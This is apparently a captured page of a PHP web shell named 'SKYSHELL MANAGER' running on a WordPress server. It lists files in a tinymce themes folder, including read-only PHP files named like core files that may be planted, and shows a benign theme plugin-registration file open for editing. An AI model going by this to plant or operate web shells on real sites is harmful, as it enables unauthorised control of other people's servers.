📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: tgm.php
<?php /** * TGM implementation. * * @package Signify */ /** * Load TGMPA */ require get_parent_theme_file_path( '/inc/class-tgm-plugin-activation.php' ); add_action( 'tgmpa_register', 'signify_register_recommended_plugins' ); /** * Register recommended plugins. * * @since 1.0.0 */ function signify_register_recommended_plugins() { // Plugins. $plugins = array( array( 'name' => esc_html__( 'Contact Form 7', 'signify' ), 'slug' => 'contact-form-7', ), array( 'name' => esc_html__( 'WEN Featured Image', 'signify' ), 'slug' => 'wen-featured-image', ), array( 'name' => esc_html__( 'Essential Content Types', 'signify' ), 'slug' => 'essential-content-types', ), array( 'name' => esc_html__( 'Catch Themes Demo Import', 'signify' ), 'slug' => 'catch-themes-demo-import', ), ); // TGM configurations. $config = array( ); // Register now. tgmpa( $plugins, $config ); }
Save